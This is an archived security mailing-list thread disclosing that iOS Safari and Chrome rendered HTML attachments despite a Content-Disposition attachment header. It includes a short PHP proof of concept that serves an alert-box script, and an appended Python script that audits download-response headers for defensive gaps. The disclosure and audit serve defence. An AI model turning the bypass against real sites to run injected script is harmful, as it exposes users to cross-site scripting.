Message-ID: <53D92929.2010904@securify.nl>
Date: Wed, 30 Jul 2014 19:19:37 +0200
From: "Securify B.V." <lists@...urify.nl>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS 6.x)

Attached is a screenshot that demonstrates this issue on Yahoo! Mail.
Despite the Content-Disposition header, (HTML) attachments are rendered
by Mobile Safari.
On 30-07-14 19:01, Securify B.V. wrote:
> This issue was originally reported as CVE-2011-3426. We can confirm
> that Mobile Safari on iOS 7.1.2 is still affected. We've reported this
> to Apple on February 25, 2014. You can test it yourself at:
> http://www.securify.nl/cve-2011-3426.html
>
> This test page sets the following HTTP headers:
>
> Content-Disposition: attachment;filename=cve-2011-3426.html
> Content-Type: application/octet-stream
>
> With kind regards,
>
> Yorick
>
>
> On Tue, 2014-07-29 at 15:56 +0800, heige wrote:
> >
> > > > Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS)
> > > >
> > > > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
> > > >
> > > > Test Environment
> > > > ipad(ios 6.1.3)
> > > > Chrome(26.0.1410.53)
> > > >
> > > > This code is downloader for attachment which is a HTML file.
> > > >
> > > > <?php
> > > > //down.php
> > > > header("Content-Type:text/plain");
> > > > //header("Content-Type:text/html");
> > > > header("Content-Disposition: attachment; filename=\"test.html\"");
> > > > echo "<html><script>alert(1)</script></html>";
> > > > ?>
> > > >
> > > > On iOS, when Chrome/Safari visits down.php, the HTML code will be run. Of course, this includes the JavaScript and leads to cross-site scripting attacks.
> > > >
> > >
> > from http://www.80vul.com/apple.txt
Download attachment "cve-2011-3426_mobilesafari_yahoo.png" of type "image/png" (74148 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
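The thread above reports that Mobile Safari rendered an HTML attachment even though the response carried `Content-Disposition: attachment` and a non-HTML `Content-Type`. The following is an added example, not code from the thread or from Securify or KnownSec: a small Python audit that parses a raw HTTP response header block and flags what a server serving user-supplied files should also send, namely `X-Content-Type-Options: nosniff` and a `Content-Security-Policy: sandbox`, both of which aim to limit damage when a browser decides to render the body anyway. The sample header blocks are the two sets of headers quoted in the thread, plus a constructed hardened variant; the finding strings and function names are this example's own, and the audit does not claim that any particular Safari build honours these headers.

```python
# Added example (not part of the thread): audit download-response headers.
# Serving user-supplied files from a separate origin remains the primary
# defence; these header checks are defence in depth for browsers that do not
# honour "Content-Disposition: attachment".

RENDERABLE_TYPES = ("text/html", "application/xhtml+xml", "image/svg+xml")


def parse_raw_headers(raw: str) -> dict:
    """Parse a raw HTTP response header block into a dict keyed by the
    lower-cased header name. A status line is skipped; repeated headers are
    joined with ', ' as RFC 7230 allows."""
    headers = {}
    for line in raw.splitlines():
        line = line.strip()
        if not line or line.startswith("HTTP/"):
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue  # malformed line without a colon, ignore it
        key = name.strip().lower()
        value = value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return headers


def header_params(value: str) -> tuple:
    """Split 'token; k=v; k2="v2"' into (token, {k: v}), lower-cased."""
    parts = [p.strip() for p in value.split(";")]
    token = parts[0].lower()
    params = {}
    for part in parts[1:]:
        k, _, v = part.partition("=")
        params[k.strip().lower()] = v.strip().strip('"').lower()
    return token, params


def audit_attachment_headers(raw: str) -> list:
    """Return a list of finding strings for a download response; an empty
    list means every header this audit looks for is present."""
    h = parse_raw_headers(raw)
    findings = []

    disp_token, _ = header_params(h.get("content-disposition", ""))
    if disp_token != "attachment":
        findings.append("Content-Disposition is not 'attachment'")

    ctype_token, _ = header_params(h.get("content-type", ""))
    if ctype_token in RENDERABLE_TYPES:
        findings.append(f"Content-Type {ctype_token} is renderable as active content")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")

    if "sandbox" not in h.get("content-security-policy", "").lower():
        findings.append("missing Content-Security-Policy: sandbox")

    return findings


# Headers of the test page quoted in the thread.
THREAD_TEST_PAGE = """HTTP/1.1 200 OK
Content-Disposition: attachment;filename=cve-2011-3426.html
Content-Type: application/octet-stream
"""

# Headers sent by the down.php proof of concept quoted in the thread.
THREAD_DOWN_PHP = """Content-Type:text/plain
Content-Disposition: attachment; filename="test.html"
"""

# Constructed hardened variant for comparison.
HARDENED = """HTTP/1.1 200 OK
Content-Disposition: attachment; filename="upload.bin"
Content-Type: application/octet-stream
X-Content-Type-Options: nosniff
Content-Security-Policy: sandbox
"""

if __name__ == "__main__":
    for label, block in (("thread test page", THREAD_TEST_PAGE),
                         ("down.php", THREAD_DOWN_PHP),
                         ("hardened", HARDENED)):
        print(label, "->", audit_attachment_headers(block) or "no findings")
```

Running the script shows that both header sets from the thread lack the two defence-in-depth headers, while the constructed hardened block produces no findings; the audit is meant for checking a file-download endpoint's configuration, not for deciding whether a specific browser is vulnerable.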